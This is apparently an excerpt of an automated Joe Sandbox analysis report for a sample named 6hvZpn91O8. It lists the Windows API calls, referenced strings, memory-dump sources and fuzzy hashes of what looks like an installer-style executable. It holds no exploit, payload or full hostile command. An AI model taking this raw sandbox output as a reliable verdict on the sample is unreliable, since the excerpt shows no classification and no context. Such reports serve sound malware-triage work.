                                                                               • 2276: 4528a3-4528aa -> 2277, 2278
                                                                               • 2277: 4528ac-4528ae -> 2279
                                                                               • 2278: 4528b0 -> 2279
                                                                               • 2279: 4528b2-4528e8 call 42e2bc call 42e73c call 403400
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                               Memory Dump Source
                                                                               • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                              • API String ID: 1646373207-2130885113
                                                                              • Opcode ID: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                              • Instruction ID: 1764834aba405073ceae9d3f2b1e241b80e40901185f6bd62a0f27775e5f306d
                                                                              • Opcode Fuzzy Hash: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                              • Instruction Fuzzy Hash: DB0188B0300300EED701BBA29D03B9B3A58EB56725F50443BF80066287D7FC4909DABD
                                                                              APIs
                                                                              • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                              • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
                                                                                • Part of subcall function 004667D8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466870
                                                                                • Part of subcall function 004667D8: DestroyCursor.USER32(00000000), ref: 00466886
                                                                              • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                              • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00466A19
                                                                              • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A3F
                                                                               Memory Dump Source
                                                                               • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                              • String ID: c:\directory$shell32.dll
                                                                              • API String ID: 3376378930-1375355148
                                                                              • Opcode ID: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
                                                                              • Instruction ID: bf7570f26ded7c71d3219d2a7bb3c54f33771564a32a8265e6d4c0c3f8c9e6f1
                                                                              • Opcode Fuzzy Hash: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
                                                                              • Instruction Fuzzy Hash: A1517070600248AFDB10DFA5CD89FDE77E9EB49344F5181B7B908AB351D638AE80CB59
                                                                              APIs
                                                                              • RegisterClipboardFormatA.USER32(commdlg_help), ref: 004307BC
                                                                              • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 004307CB
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004307E5
                                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00430806
                                                                               Memory Dump Source
                                                                               • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                              • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                              • API String ID: 4130936913-2943970505
                                                                              • Opcode ID: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                              • Instruction ID: a6afac4a95f2c597deb8a3c09a724b63b9622156ea849986cff8ddd49ab29b56
                                                                              • Opcode Fuzzy Hash: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                              • Instruction Fuzzy Hash: 68F082705583408ED700FB2588027197BE4EB98308F044A7FB498A62E1D77E8510CB9F
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748,00000000), ref: 004546D6
                                                                              • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748), ref: 004546E3
                                                                                • Part of subcall function 00454498: WaitForInputIdle.USER32(?,00000032), ref: 004544C4
                                                                                • Part of subcall function 00454498: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
                                                                                • Part of subcall function 00454498: GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
                                                                                • Part of subcall function 00454498: CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
                                                                               Memory Dump Source
                                                                               • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                              • String ID: .bat$.cmd$COMMAND.COM" /C $D$SuG$cmd.exe" /C "
                                                                              • API String ID: 854858120-3415487018
                                                                              APIs
                                                                              • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                              • OemToCharA.USER32(?,?), ref: 0042376C
                                                                              • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                              Similarity
                                                                              • API ID: Char$FileIconLoadLowerModuleName
                                                                              • String ID: 2$MAINICON
                                                                              • API String ID: 3935243913-3181700818
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                                • Part of subcall function 004230D8: 73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                • Part of subcall function 004230D8: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                • Part of subcall function 004230D8: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                                • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                              Similarity
                                                                              • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                              • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                              • API String ID: 3864787166-2767913252
                                                                              APIs
                                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                                              • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                                              • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                                              Similarity
                                                                              • API ID: LongWindow$Prop
                                                                              • String ID:
                                                                              • API String ID: 3887896539-0
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454D8B,?,00000000,00454DCB), ref: 00454CD1
                                                                              Strings
                                                                              • PendingFileRenameOperations2, xrefs: 00454CA0
                                                                              • PendingFileRenameOperations, xrefs: 00454C70
                                                                              • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454C54
                                                                              • WININIT.INI, xrefs: 00454D00
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                              • API String ID: 47109696-2199428270
                                                                              APIs
                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530CA
                                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530D3
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID: $pI$.tmp$oI
                                                                              • API String ID: 1375471231-740224434
                                                                              APIs
                                                                              • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                              • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                              • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                              Similarity
                                                                              • API ID: Window$EnumLongWindows
                                                                              • String ID: lAB
                                                                              • API String ID: 4191631535-3476862382
                                                                              APIs
                                                                              • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DD78
                                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF13,00000000,0042DF2B,?,?,?,?,00000006,?,00000000,00495CC7), ref: 0042DD93
                                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DD99
                                                                              Similarity
                                                                              • API ID: AddressDeleteHandleModuleProc
                                                                              • String ID: RegDeleteKeyExA$advapi32.dll
                                                                              • API String ID: 588496660-1846899949
                                                                              APIs
                                                                              • SetActiveWindow.USER32(?,?,00000000,00481781,?,?,00000001,?), ref: 0048157D
                                                                              • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004815F2
                                                                              Similarity
                                                                              • API ID: ActiveChangeNotifyWindow
                                                                              • String ID: $Need to restart Windows? %s
                                                                              • API String ID: 1160245247-4200181552
APIs
  • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
• GetLastError.KERNEL32(00000000,0046ECBD,?,?,0049B178,00000000), ref: 0046EB9A
• SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046EC14
• SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046EC39
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: ChangeNotify$ErrorFullLastNamePath
• String ID: Creating directory: %s
• API String ID: 2451617938-483064649
• Opcode ID: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
• Instruction ID: f0101e926757b7a11f3b593987eb06ddc2bdb0e2c9eeffddc738206aa7aee8b3
• Opcode Fuzzy Hash: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
• Instruction Fuzzy Hash: 3B512474E00248ABDB01DFA6C582BDEBBF5AF49304F50857AE811B7382D7785E04CB99
APIs
• GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 0045439E
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454464), ref: 00454408
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: AddressByteCharMultiProcWide
• String ID: SfcIsFileProtected$sfc.dll
• API String ID: 2508298434-591603554
• Opcode ID: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
• Instruction ID: a5147c4f4f255c42d32950ca2538ad48b34b390a13f5ea4f7af4ed8f8aa420c4
• Opcode Fuzzy Hash: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
• Instruction Fuzzy Hash: B841A770A403189FEB10DB55DC85B9E77B8AB45309F5080BBB808A7293E7785F89CE5D
APIs
• GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
• UnregisterClassA.USER32(?,00400000), ref: 004164BB
• RegisterClassA.USER32(?), ref: 004164DE
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Class$InfoRegisterUnregister
• String ID: @
• API String ID: 3749476976-2766056989
• Opcode ID: 428ee8849785124313965255ef08df1f1b4e8ea786c68e07a6e4b7e1ebd76e39
• Instruction ID: 7a3367fafc14ce9f55c1362753e540655f5bf3363bc6823d1bccf2610c9c9706
• Opcode Fuzzy Hash: 428ee8849785124313965255ef08df1f1b4e8ea786c68e07a6e4b7e1ebd76e39
• Instruction Fuzzy Hash: 8F3180706042009BD760EF68C881B9B77E5AB85308F00457FF945DB392DB3ED9448B6A
APIs
• 74D41520.VERSION(00000000,?,?,?,j]I), ref: 00451B90
• 74D41500.VERSION(00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BBD
• 74D41540.VERSION(?,00451C34,?,?,00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BD7
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: D41500D41520D41540
• String ID: j]I
• API String ID: 2153611984-3121892809
• Opcode ID: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
• Instruction ID: e7f530414bf3085e4d7cfc705c611aa1b86d7afe628513c8e1250cb14c5cad09
• Opcode Fuzzy Hash: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
• Instruction Fuzzy Hash: 55219575A00148AFDB02DAA98C41EBFB7FCEB49301F5544BAF800E3352D6799E04C765
APIs
• CreateProcessA.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451E9C
• GetLastError.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451EA4
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: CreateErrorLastProcess
• String ID: XtE$ptE
• API String ID: 2919029540-3149052308
• Opcode ID: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
• Instruction ID: bb22cfe1c69965ebf33bde6510f4e9c12d20d0a7e3b249448cdfa000a7835eae
• Opcode Fuzzy Hash: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
• Instruction Fuzzy Hash: CB117972600248AF8B00CEA9DC41EEFB7ECEB4C315B50456ABD08E3211D638AD148B64
APIs
• SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
  • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
  • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
  • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
• GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 395431579-1506664499
• Opcode ID: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
• Instruction ID: 0a6e4b60a995cf3844b8ce041fcdcfda7059b8caa19e1ea1d7c6064077637db5
• Opcode Fuzzy Hash: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
• Instruction Fuzzy Hash: DF115130B00618ABDB11EBA3EC46B9E7BACDB55704F904477F440A6291DB7C9E05865D
APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
• RegCloseKey.ADVAPI32(?,00454F97,?,00000001,00000000), ref: 00454F8A
Strings
• PendingFileRenameOperations2, xrefs: 00454F6B
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454F38
• PendingFileRenameOperations, xrefs: 00454F5C
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
• API String ID: 47109696-2115312317
• Opcode ID: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
• Instruction ID: 62424a60a083e79a6b05d0fdb6a44897ff41ae01fc8b0970a663cd5cbe246870
• Opcode Fuzzy Hash: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
• Instruction Fuzzy Hash: 38F06232704308AFDB05D6E9EC13E1B77EDD7C471DFA04466F800DA582DA79AD54951C
APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681), ref: 004712C1
• FindClose.KERNEL32(000000FF,004712EC,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681,?), ref: 004712DF
• FindNextFileA.KERNEL32(000000FF,?,00000000,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681), ref: 004713E3
• FindClose.KERNEL32(000000FF,0047140E,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,0000003C,00000000,?,00471681,?), ref: 00471401
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
• Instruction ID: fd5baf34d75b45a9c5a92b54ca89d945eeead41d823e22f141a566db3cd00da7
• Opcode Fuzzy Hash: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
• Instruction Fuzzy Hash: D6B10E7490424D9FCF11DFA9C881ADEBBB9FF49304F5085A6E808B7261D7389A46CF54
APIs
• FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?,00000000), ref: 0047E3F6
• FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?), ref: 0047E403
• FindNextFileA.KERNEL32(000000FF,?,00000000,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766), ref: 0047E4F8
• FindClose.KERNEL32(000000FF,0047E523,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?), ref: 0047E516
